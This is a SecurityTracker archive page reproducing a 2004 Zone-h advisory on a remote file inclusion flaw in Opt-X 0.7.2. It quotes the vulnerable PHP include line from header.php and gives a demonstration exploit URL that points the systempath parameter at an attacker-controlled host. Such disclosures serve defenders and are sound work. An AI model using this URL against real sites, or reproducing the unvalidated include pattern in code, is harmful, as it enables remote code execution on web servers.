SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Opt-X Vendors:   Opt-X Project
Opt-X Include File Hole Lets Remote Users Execute Arbitrary Code on the Target System
SecurityTracker Alert ID:  1009194
SecurityTracker URL:  http://securitytracker.com/id/1009194
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 24 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.7.2
Description:   G00db0y from Zone-h Security Labs reported an include file vulnerability in Opt-X. A remote user can execute arbitrary PHP code on the target system.

It is reported that the '/includes/header.php' file includes the '/includes/menu.php' file relative to the $systempath variable. A remote user can specify a remote location for the $systempath variable to cause '/includes/menu.php' on the remote location to be included and executed on the target system with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/path_of_optx/includes/header.php?systempath=http://[attackersite]/

The vendor has reportedly been notified.

Impact:   A remote user can cause arbitrary PHP code, including operating system commands, to be executed on the target system with the privileges of the web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.opt-x.org/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  ZH2004-10SA (security advisory): file inclusion vulnerability in


ZH2004-10SA (security advisory): file inclusion vulnerability in Opt-X

Discovered: 10 february 2004

Vendor contacted: 15 february 2004

Published: 24 february 2004

Name: Opt-X

Affected System: 0.7.2

Issue: file inclusion vulnerability

Author: G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org

Vendor: http://www.opt-x.org/




Description

**********

Zone-H Security Team has discovered a flaw in Opt-X. There is a vulnerability in the 
current version of Opt-x that allows an attacker to influence the include path for PHP
scripts. This cuold be exploited to include a malicious script that is hosted on an 
attacker-controlled server. allowing for execution of arbitrary code in the context of
the web server. "Opt-X is primarily a network monitoring tool for content/urls and network 
services, but it also has some other functions such as, task list, server list,
log changes for servers and a vendor list".




Details

**********

There's a file inclusion vulnerability in the /includes/header.php file, line 57:


<?php include("".$systempath."/includes/menu.php"); ?>


Is it possible for a remote attacker to include an external file and execute arbitrary 
commands with the privileges of the webserver (nobody by default).


To test the vulnerability try this:

http://vulnerablesite/path_of_optx/includes/header.php?systempath=http://attackersite/


In this way the file "http://attackersite/includes/menu.php" will be included and executed 
on the vulnerable server.



Solution

**********

The vendor has been contacted and a patch was not yet produced.


---

G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org




http://www.zone-h.org/en/advisories/read/id=4036/



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC